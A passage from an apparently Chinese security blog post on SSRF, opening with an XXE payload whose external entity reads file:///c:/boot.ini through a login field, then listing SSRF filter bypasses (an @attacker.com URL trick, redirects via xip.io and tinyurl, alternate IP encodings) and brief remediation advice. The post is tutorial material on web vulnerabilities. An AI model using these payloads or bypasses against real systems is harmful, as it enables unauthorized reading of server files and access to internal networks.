<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version = &quot;1.0&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">note</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY <span class="meta-keyword">hacker</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///c:/boot.ini&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">reset</span>&gt;</span><span class="tag">&lt;<span class="name">login</span>&gt;</span><span class="symbol">&amp;hacker;</span><span class="tag">&lt;/<span class="name">login</span>&gt;</span><span class="tag">&lt;<span class="name">secret</span>&gt;</span>Any bugs?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span><span class="tag">&lt;/<span class="name">reset</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/06/01/OrZ94dYtnBgK8MJ.jpg" alt="Xnip2020-06-01_20-48-47.jpg"></p>
<p>读取成功。</p>
<h1 id="0x04SSRF常见的过滤与绕过方法"><a href="#0x04SSRF常见的过滤与绕过方法" class="headerlink" title="0x04SSRF常见的过滤与绕过方法"></a>0x04SSRF常见的过滤与绕过方法</h1><h2 id="过滤方法"><a href="#过滤方法" class="headerlink" title="过滤方法"></a>过滤方法</h2><ul>
<li>过滤开头不是<a target="_blank" rel="noopener" href="http://xxxx.com的所有链接/">http://xxxx.com的所有链接</a></li>
<li>过滤格式为ip的链接，比如127.0.0.1</li>
<li>结尾必须是某个文件后缀，比如.jpg</li>
</ul>
<h2 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h2><ul>
<li><p>http基础认证：<a target="_blank" rel="noopener" href="https://link.jianshu.com/?t=http://xxx.com@attacker.com">http://xxx.com@attacker.com</a></p>
</li>
<li><p>利用302跳转（<a target="_blank" rel="noopener" href="https://link.jianshu.com/?t=http://xip.io">xip.io</a>，<a target="_blank" rel="noopener" href="https://link.jianshu.com/?t=http://www.tinyrul.com">www.tinyrul.com</a>）</p>
<p>（1）当我们访问xip.io的子域，比如127.0.0.1.xip.io的时候，实际上会被自动重定向到127.0.0.1</p>
<p>（2）如果利用上面的方法会被检测127.0.0.1的话，可以利用<a target="_blank" rel="noopener" href="https://link.jianshu.com/?t=http://www.tinyurl.com">www.tinyurl.com</a>提供的服务来进行绕过</p>
</li>
<li><p>加上#或?即可</p>
</li>
<li><p>更改其他进制的ip或对ip进行编码</p>
</li>
</ul>
<h1 id="0x05修复方案"><a href="#0x05修复方案" class="headerlink" title="0x05修复方案"></a>0x05修复方案</h1><ul>
<li>限制协议为HTTP、HTTPS</li>
<li>不用限制302重定向</li>
<li>设置URL白名单或者限制内网IP</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2020/06/01/ssrf/" data-id="ckdpdcy60000gok9rh8ys283a" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/SSRF/" rel="tag">SSRF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web%E6%BC%8F%E6%B4%9E/" rel="tag">web漏洞</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/06/03/sql-test/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          记录一次最基本的SQL注入实战
        
      </div>
    </a>
  
  
    <a href="/2020/05/30/rce/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">浅谈命令执行漏洞——RCE</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%B6%E4%BB%96/">其他</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%AE%9E%E6%88%98/">实战</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%A1%B5%E9%9D%A2%E6%B5%8B%E8%AF%95/">页面测试</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSRF/" rel="tag">SSRF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E9%9D%B6%E5%9C%BA/" rel="tag">WEB靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XXE/" rel="tag">XXE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E6%BC%8F%E6%B4%9E/" rel="tag">web漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/window%E5%85%A5%E4%BE%B5/" rel="tag">window入侵</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="tag">信息收集</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%85%B6%E4%BB%96/" rel="tag">其他</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="tag">命令执行</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B7%A5%E5%85%B7/" rel="tag">工具</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag">靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%A1%B5%E9%9D%A2%E6%B5%8B%E8%AF%95/" rel="tag">页面测试</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">SQL注入</a> <a href="/tags/SSRF/" style="font-size: 10px;">SSRF</a> <a href="/tags/WEB%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">WEB靶场</a> <a href="/tags/XXE/" style="font-size: 10px;">XXE</a> <a href="/tags/web%E6%BC%8F%E6%B4%9E/" style="font-size: 20px;">web漏洞</a> <a href="/tags/window%E5%85%A5%E4%BE%B5/" style="font-size: 10px;">window入侵</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 10px;">代码审计</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" style="font-size: 15px;">信息收集</a> <a href="/tags/%E5%85%B6%E4%BB%96/" style="font-size: 10px;">其他</a> <a href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" style="font-size: 10px;">命令执行</a> <a href="/tags/%E5%B7%A5%E5%85%B7/" style="font-size: 10px;">工具</a> <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" style="font-size: 10px;">文件包含</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">靶场</a> <a href="/tags/%E9%A1%B5%E9%9D%A2%E6%B5%8B%E8%AF%95/" style="font-size: 10px;">页面测试</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/08/05/Pentester/">Pentester靶场学习writup</a>
          </li>
        
          <li>
            <a href="/2020/06/28/information-1/">信息收集脑图</a>
          </li>
        
          <li>
            <a href="/2020/06/18/window-ruqin/">window入侵试验</a>
          </li>
        
          <li>
            <a href="/2020/06/14/information/">信息收集笔记</a>
          </li>
        
          <li>
            <a href="/2020/06/03/sql-test/">记录一次最基本的SQL注入实战</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>